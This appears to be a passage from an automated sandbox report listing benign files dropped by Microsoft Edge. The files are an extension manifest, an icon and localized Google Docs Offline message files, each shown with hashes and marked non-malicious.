              Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):962
              Entropy (8bit):5.698567446030411
              Encrypted:false
              SSDEEP:
              MD5:E805E9E69FD6ECDCA65136957B1FB3BE
              SHA1:2356F60884130C86A45D4B232A26062C7830E622
              SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
              SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
              Malicious:false
              Reputation:unknown
              Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):4982
              Entropy (8bit):7.929761711048726
              Encrypted:false
              SSDEEP:
              MD5:913064ADAAA4C4FA2A9D011B66B33183
              SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
              SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
              SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
              Malicious:false
              Reputation:unknown
              Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):908
              Entropy (8bit):4.512512697156616
              Encrypted:false
              SSDEEP:
              MD5:12403EBCCE3AE8287A9E823C0256D205
              SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
              SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
              SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1285
              Entropy (8bit):4.702209356847184
              Encrypted:false
              SSDEEP:
              MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
              SHA1:58979859B28513608626B563138097DC19236F1F
              SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
              SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1244
              Entropy (8bit):4.5533961615623735
              Encrypted:false
              SSDEEP:
              MD5:3EC93EA8F8422FDA079F8E5B3F386A73
              SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
              SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
              SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):977
              Entropy (8bit):4.867640976960053
              Encrypted:false
              SSDEEP:
              MD5:9A798FD298008074E59ECC253E2F2933
              SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
              SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
              SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):3107
              Entropy (8bit):3.535189746470889
              Encrypted:false
              SSDEEP:
              MD5:68884DFDA320B85F9FC5244C2DD00568
              SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
              SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
              SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
              Malicious:false
              Reputation:unknown
              Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1389
              Entropy (8bit):4.561317517930672
              Encrypted:false
              SSDEEP:
              MD5:2E6423F38E148AC5A5A041B1D5989CC0
              SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
              SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
              SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1763
              Entropy (8bit):4.25392954144533
              Encrypted:false
              SSDEEP:
              MD5:651375C6AF22E2BCD228347A45E3C2C9
              SHA1:109AC3A912326171D77869854D7300385F6E628C
              SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
              SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):930
              Entropy (8bit):4.569672473374877
              Encrypted:false
              SSDEEP:
              MD5:D177261FFE5F8AB4B3796D26835F8331
              SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
              SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
              SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):913
              Entropy (8bit):4.947221919047
              Encrypted:false
              SSDEEP:
              MD5:CCB00C63E4814F7C46B06E4A142F2DE9
              SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
              SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
              SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):806
              Entropy (8bit):4.815663786215102
              Encrypted:false
              SSDEEP:
              MD5:A86407C6F20818972B80B9384ACFBBED
              SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
              SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
              SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
              Malicious:false
              Reputation:unknown
              Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):883
              Entropy (8bit):4.5096240460083905
              Encrypted:false
              SSDEEP:
              MD5:B922F7FD0E8CCAC31B411FC26542C5BA
              SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
              SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
              SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1031
              Entropy (8bit):4.621865814402898
              Encrypted:false
              SSDEEP:
              MD5:D116453277CC860D196887CEC6432FFE
              SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
              SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
              SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1613
              Entropy (8bit):4.618182455684241
              Encrypted:false
              SSDEEP:
              MD5:9ABA4337C670C6349BA38FDDC27C2106
              SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
              SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
              SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):851
              Entropy (8bit):4.4858053753176526
              Encrypted:false
              SSDEEP:
              MD5:07FFBE5F24CA348723FF8C6C488ABFB8
              SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
              SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
              SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):848
              Entropy (8bit):4.494568170878587
              Encrypted:false
              SSDEEP:
              MD5:3734D498FB377CF5E4E2508B8131C0FA
              SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
              SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
              SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1425
              Entropy (8bit):4.461560329690825
              Encrypted:false
              SSDEEP:
              MD5:578215FBB8C12CB7E6CD73FBD16EC994
              SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
              SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
              SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
              Malicious:false
              Reputation:unknown
              Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):961
              Entropy (8bit):4.537633413451255
              Encrypted:false
              SSDEEP:
              MD5:F61916A206AC0E971CDCB63B29E580E3
              SHA1:994B8C985DC1E161655D6E553146FB84D0030619
              SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
              SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):959
              Entropy (8bit):4.570019855018913
              Encrypted:false
              SSDEEP:
              MD5:535331F8FB98894877811B14994FEA9D
              SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
              SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
              SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):968
              Entropy (8bit):4.633956349931516
              Encrypted:false
              SSDEEP:
              MD5:64204786E7A7C1ED9C241F1C59B81007
              SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
              SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
